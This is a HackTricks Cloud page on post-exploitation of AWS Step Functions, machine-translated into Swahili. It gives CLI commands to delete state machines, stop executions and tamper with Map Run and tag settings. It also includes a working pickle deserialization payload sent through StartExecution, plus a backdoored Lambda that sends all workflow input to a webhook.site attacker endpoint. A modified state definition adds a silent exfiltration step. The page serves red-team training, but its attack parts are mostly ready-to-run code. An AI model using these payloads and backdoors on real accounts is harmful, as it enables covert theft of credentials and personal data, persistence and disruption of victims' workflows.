AWS - Step Functions Post Exploitation

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

Step Functions

Kwa taarifa zaidi kuhusu huduma hii ya AWS, angalia:

AWS - Step Functions Enum

states:RevealSecrets

Ruhusa hii inaruhusu kufichua secret data inside an execution. Kwa ajili yake, inahitajika kuweka Inspection level kuwa TRACE na parameter revealSecrets kuwa true.

states:DeleteStateMachine, states:DeleteStateMachineVersion, states:DeleteStateMachineAlias

Mshambuliaji mwenye ruhusa hizi angeweza kufuta kabisa state machines, versions zao, na aliases. Hii inaweza kuvuruga workflows muhimu, kusababisha upotevu wa data, na kuhitaji muda mwingi ili kupona na kurejesha state machines zilizoharibika. Zaidi ya hayo, itamruhusu mshambuliaji kuficha alama alizotumia, kuvuruga uchunguzi wa forensiki, na kwa uwezekano kuathiri uendeshaji kwa kuondoa michakato muhimu ya automatisering na usanidi wa state.

Note

• Kufuta state machine pia unafuta versions zake zote zinazohusiana na aliases.
• Kufuta alias ya state machine hautafuti versions za state machine zinazotumia alias hii.
• Haiwezekani kufuta state machine version inayotajwa kwa sasa na alias moja au zaidi.

# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn <value>
# Delete state machine version
aws stepfunctions delete-state-machine-version --state-machine-version-arn <value>
# Delete state machine alias
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>

• Athari Zinazowezekana: Kuvuruga critical workflows, kupotea kwa data, na kusimamishwa kwa operesheni.

states:UpdateMapRun

Mshambuliaji mwenye ruhusa hii angeweza kuingilia usanidi wa kushindwa wa Map Run na mipangilio ya paraleli, akiwa na uwezo wa kuongeza au kupunguza idadi ya juu ya child workflow executions zinazoruhusiwa, jambo linaloathiri moja kwa moja utendaji wa huduma. Zaidi ya hayo, mshambuliaji angeweza kubadilisha tolerated failure percentage and count, akiweza kupunguza thamani hiyo hadi 0—hivyo kila unapokosa kipengee, Map Run yote itashindwa—kwa hivyo kuathiri state machine execution na kwa uwezo wa kuvuruga critical workflows.

aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]

• Potential Impact: Kupungua kwa utendaji, na kuingiliwa kwa mtiririko muhimu ya kazi.

states:StopExecution

Mshambuliaji mwenye ruhusa hii anaweza kusimamisha utekelezaji wa state machine yoyote, na kuingilia mtiririko wa kazi na michakato inayoendelea. Hii inaweza kusababisha miamala isiyokamilika, kusimamishwa kwa shughuli za kibiashara, na uwezekano wa uharibifu wa data.

Warning

Hatua hii haitegemezwi na express state machines.

aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]

• Potential Impact: Kuvuruga workflows zinazoendelea, kusimamishwa kwa shughuli za uendeshaji, na uwezekano wa uharibifu wa data.

states:TagResource, states:UntagResource

Mshambuliaji anaweza kuongeza, kubadilisha, au kuondoa tags kutoka kwa rasilimali za Step Functions, na hivyo kuvuruga ugawaji wa gharama wa shirika lako, ufuatiliaji wa rasilimali, na sera za udhibiti wa upatikanaji zinazotegemea tags.

aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>

Athari Inayowezekana: Kuzuia ugawaji wa gharama, ufuatiliaji wa rasilimali, na sera za udhibiti wa ufikiaji zinazotegemea tag.

states:StartExecution -> Input Injection Into Dangerous Sinks

states:StartExecution ni data-plane entrypoint. Iki state machine inapitisha input inayodhibitiwa na mshambuliaji katika task ambayo ina dangerous sink (kwa mfano Lambda inayofanya pickle.loads(base64.b64decode(payload_b64))), unaweza wakati mwingine kugeuza StartExecution kuwa code execution na secret exfiltration kupitia execution output, bila ruhusa yoyote ya kusasisha state machine.

Gundua workflow na Lambda inayoitwa

Ikiwa una states:List* / states:Describe*, unaweza kuorodhesha na kusoma state machine definition:

REGION=us-east-1
SM_ARN="<state_machine_arn>"

aws stepfunctions describe-state-machine --region "$REGION" --state-machine-arn "$SM_ARN" --query definition --output text

Ikiwa pia una lambda:GetFunction, unaweza kupakua Lambda code bundle ili kuelewa jinsi input inavyosindikwa (na kuthibitisha kama unsafe deserialization ipo):

LAMBDA_ARN="<lambda_arn_from_definition>"
CODE_URL="$(aws lambda get-function --region "$REGION" --function-name "$LAMBDA_ARN" --query 'Code.Location' --output text)"
curl -sSL "$CODE_URL" -o /tmp/lambda.zip
unzip -o /tmp/lambda.zip -d /tmp/lambda_code >/dev/null
ls -la /tmp/lambda_code

Mfano: crafted pickle katika ingizo la utekelezaji (Python)

Ikiwa Lambda unpickles attacker-controlled data, malicious pickle inaweza kutekeleza code wakati wa deserialization. Mfano wa payload inayotathmini tamko la Python katika Lambda runtime:

PAYLOAD_B64="$(python3 - <<'PY'
import base64, pickle

class P:
def __reduce__(self):
# Replace with a safe proof (e.g. "1+1") or a target-specific read.
return (eval, ("__import__('os').popen('id').read()",))

print(base64.b64encode(pickle.dumps(P())).decode())
PY
)"

EXEC_ARN="$(aws stepfunctions start-execution --region "$REGION" --state-machine-arn "$SM_ARN" --input "{\"payload_b64\":\"$PAYLOAD_B64\"}" --query executionArn --output text)"
aws stepfunctions describe-execution --region "$REGION" --execution-arn "$EXEC_ARN" --query output --output text

Athari: Ruhusa yoyote ambayo task role ina (Secrets Manager reads, S3 writes, KMS decrypt, n.k.) inaweza kufikiwa kupitia ingizo lililotengenezwa kwa makusudi, na matokeo yanaweza kurudishwa katika matokeo ya utekelezaji ya Step Functions.

states:UpdateStateMachine, lambda:UpdateFunctionCode

Mshambuliaji anayefanikiwa kupata udhibiti wa user au role wenye ruhusa zifuatazo:

{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AllowUpdateStateMachine",
"Effect": "Allow",
"Action": "states:UpdateStateMachine",
"Resource": "*"
},
{
"Sid": "AllowUpdateFunctionCode",
"Effect": "Allow",
"Action": "lambda:UpdateFunctionCode",
"Resource": "*"
}
]
}

…anaweza kufanya high-impact and stealthy post-exploitation attack kwa kuunganisha Lambda backdooring na Step Function logic manipulation.

Senario hii inadhaniwa kuwa mwathirika anatumia AWS Step Functions to orchestrate workflows that process sensitive input, kama credentials, tokens, au PII.

Mfano wa invocation ya mwathirika:

aws stepfunctions start-execution \
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
--input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim

Ikiwa Step Function imewekwa kuitisha Lambda kama LegitBusinessLogic, the attacker anaweza kuendelea na mbinu mbili za attack zisizoonekana:

Imesasishwa lambda function

The attacker hubadilisha msimbo wa Lambda function ambao tayari unatumika na Step Function (LegitBusinessLogic) ili kwa ukimya exfiltrate input data.

# send_to_attacker.py
import requests

def lambda_handler(event, context):
requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
return {"status": "exfiltrated"}

zip function.zip send_to_attacker.py

aws lambda update-function-code \
--function-name LegitBusinessLogic \
--zip-file fileb://function.zip -profile attacker

Ongeza Hali ya Uharibifu kwenye Step Function

Kwa njia mbadala, mshambuliaji anaweza kuingiza exfiltration state mwanzoni mwa workflow kwa kusasisha ufafanuzi wa Step Function.

{
"Comment": "Backdoored for Exfiltration",
"StartAt": "OriginalState",
"States": {
"OriginalState": {
"Type": "Task",
"Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
"End": true
}
}
}

aws stepfunctions update-state-machine \
--state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
--definition file://malicious_state_definition.json --profile attacker

Mshambuliaji anaweza kuwa wa kimyakimya zaidi kwa kusasisha state definition kuwa kitu kama hiki { “Comment”: “Backdoored for Exfiltration”, “StartAt”: “ExfiltrateSecrets”, “States”: { “ExfiltrateSecrets”: { “Type”: “Task”, “Resource”: “arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker”, “InputPath”: “$”, “ResultPath”: “$.exfil”, “Next”: “OriginalState” }, “OriginalState”: { “Type”: “Task”, “Resource”: “arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic”, “End”: true } } } ambapo mwathirika hatagundua tofauti

Mpangilio wa Mwathirika (Muktadha wa Exploit)

• Step Function (LegitStateMachine) inatumiwa kuchakata pembejeo nyeti za mtumiaji.
• Inaita moja au zaidi ya Lambda functions, kwa mfano LegitBusinessLogic.

Athari Zinazowezekana:

• Exfiltration ya kimya ya data nyeti ikiwemo secrets, credentials, API keys, na PII.
• Hakuna makosa au kushindwa vinavyoonekana katika utekelezaji wa workflow.
• Ngumu kugundua bila ukaguzi wa code ya Lambda au alama za utekelezaji.
• Inawezesha uendelevu wa muda mrefu ikiwa backdoor itaendelea kuwepo katika code au mantiki ya ASL.

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

• Angalia the subscription plans!
• Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.